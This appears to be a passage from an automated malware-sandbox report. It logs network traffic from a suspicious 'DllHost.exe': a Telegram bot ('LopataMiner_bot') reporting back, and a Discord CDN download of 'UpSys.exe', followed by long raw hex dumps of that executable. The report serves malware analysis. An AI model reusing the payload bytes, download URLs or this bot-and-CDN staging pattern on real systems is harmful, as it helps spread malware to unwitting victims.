                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                            2022-07-07 07:51:09 UTC1INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 30 33 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 34 36 38 38 31 39 30 35 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 6f 70 61 74 61 4d 69 6e 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 6f 70 61 74 61 4d 69 6e 65 72 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 32 37 30 35 32 39 39 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 73 79 61 6e 79 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 65 6e 7a 65 6c 6f 71 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 37 31 38 30 32 36 39 2c 22 74 65 78 74 22 3a 22 4e 65 77 20 55 73
                                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":20306,"from":{"id":5468819057,"is_bot":true,"first_name":"LopataMiner","username":"LopataMiner_bot"},"chat":{"id":1327052997,"first_name":"Masyanya","username":"wenzeloq","type":"private"},"date":1657180269,"text":"New Us


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            2192.168.2.449746162.159.134.233443C:\Users\user\Desktop\DllHost.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-07-07 07:51:09 UTC1OUTGET /attachments/993716767685873716/993957505698910218/UpSys.exe HTTP/1.1
                                                                                                                                                            Accept: */*
                                                                                                                                                            UA-CPU: AMD64
                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                            Host: cdn.discordapp.com
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2022-07-07 07:51:09 UTC1INHTTP/1.1 200 OK
                                                                                                                                                            Date: Thu, 07 Jul 2022 07:51:09 GMT
                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                            Content-Length: 945944
                                                                                                                                                            Connection: close
                                                                                                                                                            CF-Ray: 726efe4b7e22995a-FRA
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Age: 2369
                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                            Content-Disposition: attachment;%20filename=UpSys.exe
                                                                                                                                                            ETag: "efe5769e37ba37cf4607cb9918639932"
                                                                                                                                                            Expires: Fri, 07 Jul 2023 07:51:09 GMT
                                                                                                                                                            Last-Modified: Tue, 05 Jul 2022 19:12:16 GMT
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                            Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                            x-goog-generation: 1657048336259055
                                                                                                                                                            x-goog-hash: crc32c=tMkgSw==
                                                                                                                                                            x-goog-hash: md5=7+V2nje6N89GB8uZGGOZMg==
                                                                                                                                                            x-goog-metageneration: 1
                                                                                                                                                            x-goog-storage-class: STANDARD
                                                                                                                                                            x-goog-stored-content-encoding: identity
                                                                                                                                                            x-goog-stored-content-length: 945944
                                                                                                                                                            X-GUploader-UploadID: ADPycdtVk2BeGXLOfzG5_RPUU4jjN-wckWkna3fWHSMgPqwlJJSIudMQ6V_TO6jB_B3XaAJyPDxdXiRuvooj8Vf-miX2tQ
                                                                                                                                                            X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Um5%2FQRqiVhP98miS6ndmOpJ64h%2Bjn9C7PsIWsq3qInFW7QadUvy6y5uBpPTMaFOTGOv%2BpACp7dfWIWifcBbrcA5aoSzzGc3AemtzYnrerP8EhnzYEJN%2B17Gewot%2BGLzm6fTtfg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            2022-07-07 07:51:09 UTC3INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                                                                            2022-07-07 07:51:09 UTC3INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 80 69 b1 40 c4 08 df 13 c4 08 df 13 c4 08 df 13 79 47 49 13 c6 08 df 13 cd 70 5c 13 7d 08 df 13 cd 70 4a 13 ca 08 df 13 cd 70 5b 13 fd 08 df 13 e3 ce b2 13 cd 08 df 13 e3 ce 5f 13 c5 08 df 13 e3 ce a4 13 e5 08 df 13 c4 08 de 13 d7 0a df 13 cd 70 50 13 82 08 df 13 da 5a 4a 13 c6 08 df 13 da 5a 4b 13 c5 08 df 13 c4 08 48 13 c5 08 df 13 cd 70 4e 13 c5 08 df 13 52 69 63 68 c4 08 df
                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$i@yGIp\}pJp[_pPZJZKHpNRich
                                                                                                                                                            2022-07-07 07:51:09 UTC4INData Raw: fe ff ff e8 f5 30 01 00 48 8d 8b 10 ff ff ff e8 69 00 00 00 48 8d 8b f8 fe ff ff 48 83 c4 20 5b e9 d8 fe ff ff cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b d9 48 8b 49 48 48 85 c9 0f 85 96 05 03 00 48 8b 4b 58 33 ff 48 89 7b 48 48 85 c9 0f 85 8e 05 03 00 48 89 7b 58 89 7b 60 89 7b 64 89 7b 68 40 88 7b 20 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc 40 53 48 83 ec 20 48 8b d9 48 81 c1 d0 00 00 00 e8 5b 14 00 00 48 8d 4b 68 e8 a2 08 00 00 48 8b cb 48 83 c4 20 5b e9 95 08 00 00 cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 80 79 11 00 48 8b fa 48 8b d9 0f 85 a6 01 03 00 b9 10 00 00 00 e8 e4 5c 01 00 48 85 c0 0f 84 a8 01 03 00 8b 0f 4c 8b d8 89 08 48 8b 43 08 49 89 43 08 48 ff 03 4c 89 5b 08 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc 40 53
                                                                                                                                                            Data Ascii: 0HiHH [H\$WH HHIHHHKX3H{HHH{X{`{d{h@{ H\$0H _@SH HH[HKhHH [H\$WH yHH\HLHCICHL[H\$0H _@S
                                                                                                                                                            2022-07-07 07:51:09 UTC5INData Raw: ed 22 03 00 8b 44 24 44 44 8b 84 24 38 01 00 00 44 89 7c 24 38 89 44 24 30 41 8b c1 44 8b 8c 24 30 01 00 00 89 44 24 28 41 8b d4 44 89 6c 24 20 e8 5f 20 01 00 85 c0 0f 84 b8 fe ff ff e9 bd 22 03 00 33 c0 66 85 c0 74 1a 4d 8b 54 f3 08 48 ff c6 ff c5 66 41 8b 42 08 66 83 f8 7f 75 e6 e9 a9 23 03 00 41 83 3a 05 75 e0 4b 8b 04 c3 66 83 78 08 00 75 22 83 38 05 75 1d 44 89 64 24 40 48 8d 54 24 40 48 8d 8c 24 c0 00 00 00 41 ff c7 41 ff c4 e8 be fa ff ff 48 8b 43 08 8b 94 24 30 01 00 00 44 8b 8c 24 28 01 00 00 48 8b 4c f0 08 ff c5 66 83 79 08 00 0f 85 49 fe ff ff 8b 01 83 f8 23 0f 84 3e fe ff ff e9 cd 21 03 00 44 89 64 24 40 48 8d 54 24 40 48 8d 4c 24 78 41 ff c5 41 ff c4 e8 6f fa ff ff 4c 8b b4 24 80 00 00 00 e9 03 fe ff ff 33 db e9 2d fe ff ff 49 8b 43 08 66 83
                                                                                                                                                            Data Ascii: "D$DD$8D|$8D$0AD$0D$(ADl$ _ "3ftMTHfABfu#A:uKfxu"8uDd$@HT$@H$AAHC$0D$(HLfyI#>!Dd$@HT$@HL$xAAoL$3-ICf
                                                                                                                                                            2022-07-07 07:51:09 UTC7INData Raw: a7 50 0c 00 88 1d b1 50 0c 00 e8 fc e1 00 00 88 1d 6e 52 0c 00 88 1d 69 52 0c 00 48 89 1d 69 52 0c 00 48 89 1d 6a 52 0c 00 88 1d 6c 52 0c 00 48 89 1d 6d 52 0c 00 48 89 1d 6e 52 0c 00 88 1d 70 52 0c 00 48 89 1d 71 52 0c 00 89 1d ab 62 0c 00 c7 05 a5 62 0c 00 ff ff ff ff 48 8d 05 3a 4f 0c 00 48 83 c4 20 5b c3 cc cc cc cc 40 53 56 57 48 81 ec 80 00 00 00 8b 05 53 38 0b 00 48 8b f9 48 8d 15 95 cc 09 00 48 8d 4c 24 58 33 f6 c7 44 24 48 01 00 00 00 89 44 24 40 48 89 74 24 50 e8 b8 00 00 00 44 8d 4e 01 4c 8d 44 24 40 48 8d 54 24 58 48 8d 0d 3b 4d 0c 00 e8 4e dd 00 00 48 8d 4c 24 58 e8 74 09 00 00 8b 1d fe 37 0b 00 48 8d 4c 24 40 e8 94 5d 00 00 48 8d 15 55 cc 09 00 48 8d 4c 24 58 c7 44 24 48 01 00 00 00 89 5c 24 40 e8 67 00 00 00 44 8d 4e 01 4c 8d 44 24 40 48 8d
                                                                                                                                                            Data Ascii: PPnRiRHiRHjRlRHmRHnRpRHqRbbH:OH [@SVWHS8HHHL$X3D$HD$@Ht$PDNLD$@HT$XH;MNHL$Xt7HL$@]HUHL$XD$H\$@gDNLD$@H
                                                                                                                                                            2022-07-07 07:51:09 UTC8INData Raw: ff ff e8 db 04 00 00 48 8d 8f 48 f9 ff ff e8 cf 04 00 00 48 8d 8f 28 f9 ff ff e8 c3 04 00 00 48 8d 8f e8 f8 ff ff 48 8b 5c 24 48 48 8b 6c 24 50 48 83 c4 20 41 5c 5f 5e e9 95 ef ff ff cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b fa 48 8b d9 e8 5b 11 00 00 4c 8b 5b 08 48 8b 03 49 3b fb 0f 83 bb 0b 03 00 48 8d 04 78 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 4d 85 c0 74 0d 4c 8b 49 08 49 3b d1 0f 82 fa 0a 03 00 48 83 c4 28 c3 cc cc cc cc cc 48 89 5c 24 10 48 89 6c 24 20 56 57 41 54 48 81 ec c0 00 00 00 48 8d 4c 24 70 48 8b da e8 ee 0e 01 00 48 8d 4c 24 70 33 f6 48 8b d3 89 b4 24 e0 00 00 00 e8 f8 0e 00 00 4c 8d 25 61 3d 0c 00 41 b8 04 01 00 00 49 8b d4 33 c9 ff 15 00 54 09 00 48 8d 15 11 93 09 00 48 8d 0d c2 5c 0c
                                                                                                                                                            Data Ascii: HHH(HH\$HHl$PH A\_^H\$WH HH[L[HI;HxH\$0H _H(MtLII;H(H\$Hl$ VWATHHL$pHHL$p3H$L%a=AI3THH\
                                                                                                                                                            2022-07-07 07:51:09 UTC9INData Raw: 00 49 8b f0 48 8b ea 48 8b d9 0f 84 80 00 00 00 33 ff 48 85 f6 74 25 66 90 8b 43 10 39 43 14 74 37 48 63 53 14 48 8b 4b 08 48 ff c7 0f b6 14 0a 88 54 2f ff ff 43 14 48 3b fe 72 dd 48 01 7b 18 48 8b 6c 24 50 48 8b 74 24 58 48 8b 5c 24 48 48 8b c7 48 83 c4 30 5f c3 48 8b 53 08 48 8b 0b 4c 8d 4c 24 40 41 b8 00 00 01 00 48 c7 44 24 20 00 00 00 00 ff 15 40 4c 09 00 44 8b 5c 24 40 45 85 db 74 b9 44 89 5b 10 c7 43 14 00 00 00 00 eb 91 c7 41 10 00 00 00 00 c7 41 14 00 00 00 00 e8 b6 0f 01 00 48 89 43 18 e9 64 ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 48 85 d2 0f 84 03 ef 02 00 48 89 5c 24 30 48 89 74 24 38 33 f6 66 83 3a 23 48 89 7c 24 20 48 8b da 8b fe 0f 84 ea ee 02 00 66 39 33 74 11 0f b7 03 83 f8 3b 7e 27 48 83 c3 02 66 39 33 75 ef 85 ff 0f
                                                                                                                                                            Data Ascii: IHH3Ht%fC9Ct7HcSHKHT/CH;rH{Hl$PHt$XH\$HHH0_HSHLL$@AHD$ @LD\$@EtD[CAAHCdH(HH\$0Ht$83f:#H|$ Hf93t;~'Hf93u
                                                                                                                                                            2022-07-07 07:51:09 UTC11INData Raw: ce 48 ff c2 e8 c7 fe ff ff 48 8b 4e 08 48 8b 06 40 88 2c 01 48 ff 46 08 48 8b 4e 08 48 8b 06 44 88 2c 01 e9 6c ff ff ff 48 8d 54 24 60 41 b8 01 00 00 00 48 8b cf e8 55 fa ff ff 48 85 c0 74 0b 80 7c 24 60 0a 0f 85 3f f8 02 00 b0 01 48 8b 6c 24 70 48 83 c4 30 41 5d 41 5c 5f 5e 5b c3 48 8b 57 08 48 8b 0f 4c 8d 4c 24 68 41 b8 00 00 01 00 4c 89 6c 24 20 ff 15 e5 46 09 00 44 8b 5c 24 68 45 85 db 0f 84 43 ff ff ff e9 ac f7 02 00 45 84 e4 75 b8 32 c0 48 8b 6c 24 70 48 83 c4 30 41 5d 41 5c 5f 5e 5b c3 cc cc cc cc cc cc cc cc cc cc 40 55 56 b8 38 2d 00 00 e8 13 e0 02 00 48 2b e0 8b 05 da 5a 0c 00 49 8b f1 48 8b e9 ff c0 83 f8 30 89 05 c9 5a 0c 00 0f 8d f3 15 03 00 48 89 9c 24 50 2d 00 00 48 89 bc 24 58 2d 00 00 4c 89 a4 24 60 2d 00 00 4c 89 ac 24 30 2d 00 00 4c 89
                                                                                                                                                            Data Ascii: HHNH@,HFHNHD,lHT$`AHUHt|$`?Hl$pH0A]A\_^[HWHLL$hALl$ FD\$hECEu2Hl$pH0A]A\_^[@UV8-H+ZIH0ZH$P-H$X-L$`-L$0-L
                                                                                                                                                            2022-07-07 07:51:09 UTC12INData Raw: 63 08 33 f6 48 8b d7 49 8b cc 89 33 e8 96 d6 00 00 45 32 ed 45 32 ff 8b ee 8b fe 89 b4 24 80 20 00 00 48 63 d5 49 8b cc e8 0a f0 ff ff 0f b7 08 66 83 f9 20 0f 84 ed fb 02 00 66 83 f9 09 0f 84 e3 fb 02 00 0f 1f 00 49 8b cc 48 63 dd e8 55 01 00 00 4d 8b 5c 24 08 49 8b 04 24 49 3b db 0f 83 bd 00 00 00 48 8d 0c 58 0f b7 01 66 85 c0 0f 84 c5 00 00 00 ff c5 81 ff 00 10 00 00 0f 8d b7 00 00 00 66 83 f8 20 74 37 66 83 f8 09 74 31 66 83 f8 22 74 0c 66 89 44 74 40 ff c7 48 ff c6 eb a7 48 63 d5 49 8b cc e8 8c ef ff ff 66 83 38 22 0f 84 79 fb 02 00 45 84 ed 74 70 45 32 ed eb 88 41 80 fd 01 74 cf 48 8d 54 24 40 48 8d 4c 24 20 33 db 66 89 5c 74 40 e8 1c eb ff ff 48 8d 54 24 20 49 8b ce e8 df ed 00 00 48 8d 4c 24 20 e8 e5 f3 ff ff 8b fb 48 8b f3 45 32 ff 48 63 d5 49 8b
                                                                                                                                                            Data Ascii: c3HI3E2E2$ HcIf fIHcUM\$I$I;HXff t7ft1f"tfDt@HHcIf8"yEtpE2AtHT$@HL$ 3f\t@HT$ IHL$ HE2HcI
                                                                                                                                                            2022-07-07 07:51:09 UTC13INData Raw: 01 ff 50 08 49 8b cc 85 c0 78 52 ba 01 00 00 00 8b d8 e8 47 0b 00 00 41 89 1c 24 48 8b 5c 24 40 48 8b 6c 24 48 48 8b 74 24 50 48 83 c4 20 41 5d 41 5c 5f c3 85 ff 78 b1 66 83 fe 20 75 36 33 d2 49 8b cc e8 16 0b 00 00 41 89 3c 24 eb cd 66 83 fe 39 0f 86 1e ff ff ff e9 40 ff ff ff ba 34 00 00 00 e8 f7 0a 00 00 48 8b d5 49 8b cc e8 8c 0b 00 00 eb a7 66 83 fe 09 74 c4 66 83 fe 2c 74 be 66 83 fe 3d 74 b8 66 83 fe 28 74 b2 66 83 fe 29 74 ac 66 83 fe 5d 74 a6 66 85 f6 74 a1 e9 70 fc 02 00 cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 48 ff c2 48 39 51 10 72 05 48 83 c4 28 c3 48 89 5c 24 30 48 89 7c 24 20 48 8b d9 48 81 fa c2 41 00 00 0f 83 84 ee 02 00 48 8d 04 12 48 89 41 10 48 8b 4b 10 48 85 c9 0f 84 83 ef 02 00 48 83 c1 07 48 83 e1 f8 48 89 4b 10 b8 02 00 00
                                                                                                                                                            Data Ascii: PIxRGA$H\$@Hl$HHt$PH A]A\_xf u63IA<$f9@4HIftf,tf=tf(tf)tf]tftpH(HH9QrH(H\$0H|$ HHAHHAHKHHHHK
                                                                                                                                                            2022-07-07 07:51:09 UTC15INData Raw: 41 8b 14 6e eb d5 66 83 fa 30 0f 83 1e 02 00 00 66 83 fa 5f 74 dd 48 83 7c 24 48 00 0f 84 74 03 03 00 48 8d 4c 24 40 e8 c9 f6 ff ff 8b 54 24 48 48 8b 4c 24 40 ff 15 82 40 09 00 66 44 8b 5c 24 38 66 41 83 fb 30 0f 8d 49 02 00 00 48 8d 54 24 40 48 8d 4c 24 30 66 89 74 24 38 4c 89 64 24 30 e8 40 06 00 00 48 8d 54 24 30 49 8b cd e8 73 04 00 00 e9 c3 fe ff ff 66 83 fb 5a 0f 87 a9 fd ff ff 48 8d 44 24 40 4c 8d 4c 24 30 4c 8d 84 24 a0 00 00 00 48 8d 0d 6b 42 0c 00 49 8b d6 48 89 44 24 20 e8 2e f9 ff ff 83 7c 24 30 ff 0f 84 02 03 03 00 48 8d 54 24 30 49 8b cd e8 26 04 00 00 8b ac 24 a0 00 00 00 e9 6f fe ff ff ff c5 66 41 83 3c 6e 3d 0f 84 89 02 03 00 48 8d 4c 24 30 ba 41 00 00 00 e8 1d 05 00 00 48 8d 54 24 30 49 8b cd e8 f0 03 00 00 e9 40 fe ff ff 48 8d 4c 24 30
                                                                                                                                                            Data Ascii: Anf0f_tH|$HtHL$@T$HHL$@@fD\$8fA0IHT$@HL$0ft$8Ld$0@HT$0IsfZHD$@LL$0L$HkBIHD$ .|$0HT$0I&$ofA<n=HL$0AHT$0I@HL$0
                                                                                                                                                            2022-07-07 07:51:09 UTC16INData Raw: 48 89 1c c8 48 ff 47 10 48 8b 5c 24 30 48 83 c4 20 5f c3 66 83 f8 30 7c c2 b9 20 00 00 00 e8 71 2d 01 00 48 85 c0 0f 84 80 e3 02 00 48 8b 16 48 8b 0a 48 89 08 48 8b 4a 08 48 89 48 08 48 8b 4a 10 48 89 48 10 48 8b 4a 18 48 89 48 18 ff 01 48 89 03 eb 9f 4d 03 c0 b8 04 00 00 00 4c 3b c0 4c 0f 42 c0 b8 08 00 00 00 4c 89 41 18 48 c7 c1 ff ff ff ff 49 f7 e0 48 0f 40 c1 48 8b c8 e8 12 2d 01 00 4c 8b 47 10 48 8b 57 08 49 c1 e0 03 48 8b c8 48 8b d8 e8 33 25 01 00 48 8b 4f 08 e8 7a 28 01 00 48 89 5f 08 e9 04 ff ff ff cc 48 89 5c 24 10 48 89 6c 24 18 57 48 83 ec 20 0f b7 41 08 33 ed 8b da 66 83 f8 30 48 8b f9 7c 35 66 83 f8 3f 7f 2f 48 89 74 24 30 48 8b 31 48 85 f6 74 1a 48 8b 46 18 ff 08 48 8b 46 18 39 28 0f 84 4b e0 02 00 48 8b ce e8 23 28 01 00 48 8b 74 24 30 48
                                                                                                                                                            Data Ascii: HHGH\$0H _f0| q-HHHHHJHHHJHHHJHHHML;LBLAHIH@H-LGHWIHH3%HOz(H_H\$Hl$WH A3f0H|5f?/Ht$0H1HtHFHF9(KH#(Ht$0H
                                                                                                                                                            2022-07-07 07:51:09 UTC17INData Raw: 89 2c 48 4c 8b 6c 24 20 48 8b c6 48 83 c4 30 5e c3 ff 08 b9 04 00 00 00 48 89 5c 24 40 e8 19 28 01 00 48 85 c0 0f 84 3d e5 02 00 c7 00 01 00 00 00 48 89 46 18 48 8b 46 08 48 8d 4c 38 01 48 89 4e 10 48 85 c9 0f 84 25 e5 02 00 48 83 c1 07 48 83 e1 f8 48 89 4e 10 b8 02 00 00 00 48 f7 e1 48 c7 c1 ff ff ff ff 48 0f 40 c1 48 8b c8 e8 c9 27 01 00 4c 8b 46 08 48 8b 16 4f 8d 44 00 02 48 8b c8 48 8b d8 e8 ea 1f 01 00 48 89 1e 48 8b 5c 24 40 e9 32 ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 40 48 8b d9 48 3b ca 0f 84 ce e4 02 00 49 83 c9 ff 45 33 c0 e8 a2 fe ff ff 48 83 c4 40 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 8b 41 08 48 8b da 48 8b f9 83 f8 04 0f 85 94 fa 02 00 83 7b 08 04 0f 85 ce fa 02 00 48 8b 53 10 48 8b
                                                                                                                                                            Data Ascii: ,HLl$ HH0^H\$@(H=HFHFHL8HNH%HHHNHHH@H'LFHODHHHH\$@2@SH@HH;IE3H@[H\$WH AHH{HSH
                                                                                                                                                            2022-07-07 07:51:09 UTC19INData Raw: 00 00 80 7f 10 00 0f 84 0e 06 03 00 c6 47 11 01 48 ff 0f 48 8b 7c 24 68 83 fe 0a 0f 84 1c 0b 03 00 83 fe 10 0f 84 13 0b 03 00 83 fe 11 0f 84 0a 0b 03 00 8b 4d 08 83 f9 02 0f 8c 58 0b 03 00 83 fe 0b 0f 84 d1 00 00 00 83 fe 0d 74 55 83 fe 0e 0f 84 06 01 00 00 83 fe 09 0f 85 72 01 00 00 83 f9 01 0f 84 2a 0a 03 00 80 7d 19 00 0f 85 29 0a 03 00 48 8b 55 10 83 f9 02 0f 85 29 0a 03 00 48 8b 4d 00 e8 f2 fa ff ff 48 8b cd e8 ca fe ff ff 33 c0 48 8b 5c 24 60 48 8b 6c 24 70 48 83 c4 50 5e c3 83 f9 01 0f 84 4c 0a 03 00 80 7d 19 00 0f 85 4b 0a 03 00 48 8b 55 10 83 f9 02 0f 84 eb 00 00 00 80 7d 19 00 0f 85 41 0a 03 00 48 8b 45 10 48 8b 48 18 e8 81 fb ff ff 48 8b cd e8 79 fe ff ff 33 c0 48 8b 5c 24 60 48 8b 6c 24 70 48 83 c4 50 5e c3 48 8b 52 08 48 8b 4a 08 e9 f2 fe ff
                                                                                                                                                            Data Ascii: GHH|$hMXtUr*})HU)HMH3H\$`Hl$pHP^L}KHU}AHEHHHy3H\$`Hl$pHP^HRHJ
                                                                                                                                                            2022-07-07 07:51:09 UTC20INData Raw: 0b 03 00 0f 29 7c 24 40 83 fa 01 0f 85 34 0c 03 00 66 0f 6e 7f 30 f3 0f e6 ff 66 0f 2f f7 0f 28 7c 24 40 0f 87 89 0b 03 00 4c 63 47 20 48 63 46 08 4b 8d 0c 40 48 8d 14 88 41 8b 8c 96 60 03 0b 00 83 f9 01 0f 85 a2 0d 03 00 41 83 f8 01 0f 85 59 0e 03 00 8b 5f 18 8b 46 08 83 f8 01 0f 85 24 0f 03 00 8b 06 3b d8 7c 78 8b 47 04 ff c0 41 89 45 00 0f 28 74 24 50 48 8b 4c 24 30 48 85 c9 0f 85 e0 0f 03 00 83 7c 24 28 08 0f 84 e9 0f 03 00 83 7c 24 28 0a 0f 84 02 10 03 00 83 7c 24 28 05 0f 84 15 10 03 00 83 7c 24 28 0b 0f 84 1a 10 03 00 83 7c 24 28 0c 0f 84 2d 10 03 00 4c 8b b4 24 a8 00 00 00 48 8b ac 24 a0 00 00 00 48 8b 9c 24 98 00 00 00 48 83 c4 60 41 5f 41 5d 41 5c 5f 5e c3 49 8b cc e8 c8 b7 00 00 eb 87 cc cc cc cc cc cc 48 83 ec 28 48 85 d2 0f 84 d0 00 00 00 48
                                                                                                                                                            Data Ascii: )|$@4fn0f/(|$@LcG HcFK@HA`AY_F$;|xGAE(t$PHL$0H|$(|$(|$(|$(|$(-L$H$H$H`A_A]A\_^IH(HH
                                                                                                                                                            2022-07-07 07:51:09 UTC21INData Raw: cb 55 00 00 a2 a1 03 00 f6 a1 03 00 12 a2 03 00 31 a2 03 00 50 a2 03 00 da a1 03 00 6f a2 03 00 8b a2 03 00 53 55 00 00 0e a3 03 00 e2 55 00 00 0e a3 03 00 dc a2 03 00 f5 a2 03 00 0e a3 03 00 0e a3 03 00 0e a3 03 00 be a1 03 00 cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 18 48 89 4c 24 08 55 56 57 41 54 41 55 41 56 41 57 48 81 ec e0 00 00 00 8b 05 7e 31 0c 00 33 ed 49 8b d9 4d 8b e0 4c 8b ea 48 8b f9 a8 01 0f 84 1a 08 00 00 45 32 f6 b9 10 00 00 00 c6 44 24 60 01 48 89 5c 24 30 89 6c 24 38 48 89 6c 24 40 44 88 74 24 61 c6 44 24 48 01 40 88 6c 24 49 e8 71 17 01 00 48 85 c0 0f 84 00 29 03 00 48 8b f0 c7 00 14 00 00 00 44 8b bc 24 40 01 00 00 48 89 6e 08 41 8b 0c 24 0f 29 b4 24 d0 00 00 00 49 8b 45 08 48 89 74 24 58 48 c7 44 24 50 01 00 00 00 48 8b 0c c8
                                                                                                                                                            Data Ascii: U1PoSUUH\$HL$UVWATAUAVAWH~13IMLHE2D$`H\$0l$8Hl$@Dt$aD$H@l$IqH)HD$@HnA$)$IEHt$XHD$PH
                                                                                                                                                            2022-07-07 07:51:09 UTC23INData Raw: 18 48 89 7c 24 40 e9 7e fe ff ff 80 7c 24 49 00 0f 85 97 2c 03 00 48 8b 7c 24 40 e9 8b fe ff ff 4c 8d 44 24 30 48 8d 54 24 50 48 8b cf e8 8d ef ff ff 85 c0 0f 85 ca 32 03 00 44 0f b6 74 24 61 48 8b 74 24 58 4c 8d 1d b3 a3 ff ff e9 c0 fb ff ff 45 32 f6 89 2e 44 88 74 24 61 e9 f2 fe ff ff 48 8b 4c 24 40 49 8b d2 e8 82 1e 00 00 c6 44 24 49 00 4c 8d 15 0e 2c 0c 00 4c 8d 1d 7f a3 ff ff e9 04 fe ff ff 83 fd 16 0f 85 a5 01 00 00 bd 0b 00 00 00 8d 42 01 41 89 04 24 e9 6f fb ff ff 48 8b 5f 18 48 8b cf e8 94 1d 00 00 48 8b cf e8 ac 0d 01 00 48 8b fb 48 85 db 0f 84 93 fb ff ff eb de 8d 42 01 bd 0e 00 00 00 41 89 04 24 e9 3c fb ff ff 80 7c 24 49 00 0f 84 1e 01 00 00 48 8b 4c 24 40 49 8b d2 e8 05 1e 00 00 c6 44 24 49 00 e9 1f fc ff ff 80 7c 24 49 00 0f 85 a3 2f 03 00
                                                                                                                                                            Data Ascii: H|$@~|$I,H|$@LD$0HT$PH2Dt$aHt$XLE2.Dt$aHL$@ID$IL,LBA$oH_HHHHBA$<|$IHL$@ID$I|$I/
